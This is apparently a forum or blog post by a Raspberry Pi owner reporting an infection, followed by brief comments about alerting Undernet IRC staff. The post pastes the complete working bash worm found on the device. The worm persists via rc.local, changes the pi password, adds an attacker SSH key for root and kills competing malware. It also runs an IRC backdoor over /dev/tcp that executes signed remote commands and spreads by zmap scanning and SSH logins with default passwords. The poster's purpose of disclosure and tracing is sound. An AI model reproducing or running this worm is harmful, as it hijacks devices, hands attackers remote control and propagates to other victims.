Today, my raspberry pi were hacked, and the load went from 0.01 to 8 or more. Zmap is the highest process that hogging the cpu.
So I checked the /etc/rc.local, and it gives me a line that run /opt/6vRKumYc. The 6vRKumYc file is a bash script that will do some task like this :
- copy the file path and include in /etc/rc.local
- kill all process of minerd, node, nodejs, ktx, arm*, zmap, kaiten, perl
- change the /etc/hosts to bins.deutschland-zahlung.eu
- remove the root and pi .bashrc
- change the default pi password
- create authorized_keys for root
- make a /tmp/public.pem
- make an irc bot, and connect to this undernet irc servers:
– ix1.undernet.org
– ix2.undernet.org
– Ashburn.Va.Us.UnderNet.org
– Bucharest.RO.EU.Undernet.Org
– Budapest.HU.EU.UnderNet.org
– Chicago.IL.US.Undernet.org - connect to the channel #biret
- scan all device in the same ip range, and then login as pi user, and copy itself to another device
Maybe this is the copy of the code, so some authorized police can track the malware creator :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 |
#!/bin/bash MYSELF=`realpath $0` DEBUG=/dev/null echo $MYSELF >> $DEBUG if [ "$EUID" -ne 0 ] then NEWMYSELF=`mktemp -u 'XXXXXXXX'` sudo cp $MYSELF /opt/$NEWMYSELF sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local" sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local" sudo sh -c "echo 'exit 0' >> /etc/rc.local" sleep 1 sudo reboot else TMP1=`mktemp` echo $TMP1 >> $DEBUG killall bins.sh killall minerd killall node killall nodejs killall ktx-armv4l killall ktx-i586 killall ktx-m68k killall ktx-mips killall ktx-mipsel killall ktx-powerpc killall ktx-sh4 killall ktx-sparc killall arm5 killall zmap killall kaiten killall perl echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts rm -rf /root/.bashrc rm -rf /home/pi/.bashrc usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi mkdir -p /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B" >> /root/.ssh/authorized_keys echo "nameserver 8.8.8.8" >> /etc/resolv.conf rm -rf /tmp/ktx* rm -rf /tmp/cpuminer-multi rm -rf /var/tmp/kaiten cat > /tmp/public.pem <<EOFMARKER -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF WRq+Z8HYMvPlgSRA3wIDAQAB -----END PUBLIC KEY----- EOFMARKER BOT=`mktemp -u 'XXXXXXXX'` cat > /tmp/$BOT <<'EOFMARKER' #!/bin/bash SYS=`uname -a | md5sum | awk -F' ' '{print $1}'` NICK=a${SYS:24} while [ true ]; do arr[0]="ix1.undernet.org" arr[1]="ix2.undernet.org" arr[2]="Ashburn.Va.Us.UnderNet.org" arr[3]="Bucharest.RO.EU.Undernet.Org" arr[4]="Budapest.HU.EU.UnderNet.org" arr[5]="Chicago.IL.US.Undernet.org" rand=$[$RANDOM % 6] svr=${arr[$rand]} eval 'exec 3<>/dev/tcp/$svr/6667;' if [[ ! "$?" -eq 0 ]] ; then continue fi echo $NICK eval 'printf "NICK $NICK\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then continue fi eval 'printf "USER user 8 * :IRC hi\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then continue fi # Main loop while [ true ]; do eval "read msg_in <&3;" if [[ ! "$?" -eq 0 ]] ; then break fi if [[ "$msg_in" =~ "PING" ]] ; then printf "PONG %s\n" "${msg_in:5}"; eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi sleep 1 eval 'printf "JOIN #biret\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then privmsg_h=$(echo $msg_in| cut -d':' -f 3) privmsg_data=$(echo $msg_in| cut -d':' -f 4) privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1) hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'` sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin` if [[ "$sign" == "$hash" ]] ; then CMD=`echo $privmsg_data | base64 -d -i` RES=`bash -c "$CMD" | base64 -w 0` eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi fi fi done done EOFMARKER chmod +x /tmp/$BOT nohup /tmp/$BOT 2>&1 > /tmp/bot.log & rm /tmp/nohup.log -rf rm -rf nohup.out sleep 3 rm -rf /tmp/$BOT NAME=`mktemp -u 'XXXXXXXX'` date > /tmp/.s apt-get update -y --force-yes apt-get install zmap sshpass -y --force-yes while [ true ]; do FILE=`mktemp` zmap -p 22 -o $FILE -n 100000 killall ssh scp for IP in `cat $FILE` do sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & done rm -rf $FILE sleep 10 done fi |
I have joined the us.undernet.org on channel #Help, #cservice, #hack, #theguard, #abuse, but there no moderator/admin online, so I sent an email to abuse-expoits@undernet.org, but there’s no address like that on the server.
maybe abuse-exploits@…. ?
I’m on Undernet and saw this. I’ve alerted one of the IRCops, awaiting some info now.
Thanks, I wish someone can track it.